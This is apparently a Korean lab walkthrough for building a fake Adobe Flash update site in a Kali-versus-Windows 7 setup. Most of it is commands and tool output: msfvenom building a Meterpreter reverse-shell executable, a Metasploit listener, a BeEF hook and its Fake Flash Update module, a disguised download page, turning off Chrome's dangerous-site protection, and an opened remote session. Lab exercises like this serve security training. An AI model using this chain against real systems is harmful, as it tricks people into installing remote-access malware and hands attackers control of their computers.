Fake Update Site 구축

- 사용 시스템

KaliLinux

Window 7

- adobe flash fake update 

(kail)

- 페이로드 생성

# cd /var/www/html

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.27.50 LPORT=4444 \

-f exe -o payload.exe 

# ls

index.html  payload.exe

[TERM1]

# msfconsole

msf > load msgrpc Pass=abc123 [*] MSGRPC Service:  127.0.0.1:55552  [*] MSGRPC Username: msf [*] MSGRPC Password: abc123 [*] Successfully loaded plugin: msgrpc msf >  msf > use exploit/multi/handler  msf exploit(handler) > show options Module options (exploit/multi/handler):    Name  Current Setting  Required  Description    ----  ---------------  --------  ----------- Exploit target:    Id  Name    --  ----    0   Wildcard Target msf exploit(handler) > set payload windows/meterpreter/reverse_tcp  payload => windows/meterpreter/reverse_tcp msf exploit(handler) > show options  Module options (exploit/multi/handler):    Name  Current Setting  Required  Description    ----  ---------------  --------  ----------- Payload options (windows/meterpreter/reverse_tcp):    Name      Current Setting  Required  Description    ----      ---------------  --------  -----------    EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)    LHOST                      yes       The listen address    LPORT     4444             yes       The listen port Exploit target:    Id  Name    --  ----    0   Wildcard Target msf exploit(handler) > set LHOST 192.168.27.50 LHOST => 192.168.27.50 msf exploit(handler) > show options Module options (exploit/multi/handler):    Name  Current Setting  Required  Description    ----  ---------------  --------  ----------- Payload options (windows/meterpreter/reverse_tcp):    Name      Current Setting  Required  Description    ----      ---------------  --------  -----------    EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)    LHOST     192.168.27.50    yes       The listen address    LPORT     4444             yes       The listen port Exploit target:    Id  Name    --  ----    0   Wildcard Target msf exploit(handler) > exploit  [*] Started reverse TCP handler on 192.168.27.50:4444  [*] Starting the payload handler...

[TERM2]

# cd /usr/share/beef-xss

# ./beef -x

[20:43:56][*] Bind socket [imapeudora1] listening on [0.0.0.0:2000]. [20:43:56][*] Browser Exploitation Framework (BeEF) 0.4.7.0-alpha [20:43:56]    |   Twit: @beefproject [20:43:56]    |   Site: http://beefproject.com [20:43:56]    |   Blog: http://blog.beefproject.com [20:43:56]    |_  Wiki: https://github.com/beefproject/beef/wiki [20:43:56][*] Project Creator: Wade Alcorn (@WadeAlcorn) [20:43:57][*] Successful connection with Metasploit. [20:44:01][*] Loaded 297 Metasploit exploits. [20:44:01][*] Resetting the database for BeEF. [20:44:02][*] BeEF is loading. Wait a few seconds... [20:44:20][*] 13 extensions enabled. [20:44:20][*] 550 modules enabled. [20:44:20][*] 3 network interfaces were detected. [20:44:20][+] running on network interface: 127.0.0.1 [20:44:20]    |   Hook URL: http://127.0.0.1:3000/hook.js [20:44:20]    |_  UI URL:   http://127.0.0.1:3000/ui/panel [20:44:20][+] running on network interface: 192.168.17.50 [20:44:20]    |   Hook URL: http://192.168.17.50:3000/hook.js [20:44:20]    |_  UI URL:   http://192.168.17.50:3000/ui/panel [20:44:20][+] running on network interface: 192.168.27.50 [20:44:20]    |   Hook URL: http://192.168.27.50:3000/hook.js [20:44:20]    |_  UI URL:   http://192.168.27.50:3000/ui/panel [20:44:20][*] RESTful API key: 4633f1e85c608a41c26864e550860f9372997d36 [20:44:20][*] HTTP Proxy: http://127.0.0.1:6789 [20:44:20][*] BeEF server started (press control+c to stop)

[TERM3]

# cd /var/www/html

# vi index.html

<DOCTYPE html> <html> <head> <title>Adobe flash</title> <script src="http://192.168.27.50:3000/hook.js"></script> </head> <body><center> <img src="adobe.png" alt="adobe" width="204" length="204"> <p> <input type="button" name="btnDownload" value="Update" onclick="window.open('payload.exe','download') return false;"/> </p> </body> </html>

> adobe.png 를 적당히 하나 다운 받습니다. 

# ls

adobe.png  index.html  payload.exe

# service spache2 restart

# firefox http://192.168.27.50:3000/ui/panel &

ID beef    PASS beef

(win7)

크롬 "chrome://settings/"    > 고급 > 위험한 사이트로부터 사용자와 기기 보호 해제 

http://192.168.27.50 접속

> 등록한 사진과 버튼이 보인다. 

(kali) 

Command > Social Engineering > Fake Flash Update  > execute

Image : http://192.168.27.50:300/adobe/flash_update.png

Payload : Custom_Payload

Custom Payload URL  : http://192.168.27.50/payload.exe

(win7)

> 감쪽같은 창이 뜨고 INSTALL을 누르면 

> payload.exe가 설치된다. 그리고 payload를 실행하면 msfconsole에 연결됩니다. 

(kali)

[TERM1]

[*] Sending stage (957487 bytes) to 192.168.27.202 [*] Meterpreter session 1 opened (192.168.27.50:4444 -> 192.168.27.202:49778) at 2017-11-13 21:05:36 +0900 meterpreter >  meterpreter > sysinfo Computer        : ADMINSTRATOR-PC OS              : Windows 7 (Build 7601, Service Pack 1). Architecture    : x64 System Language : ko_KR Domain          : WORKGROUP Logged On Users : 2 Meterpreter     : x86/windows meterpreter > quit [*] Shutting down Meterpreter... [*] 192.168.27.202 - Meterpreter session 1 closed.  Reason: User exit

> 연결되어 권한을 얻었다.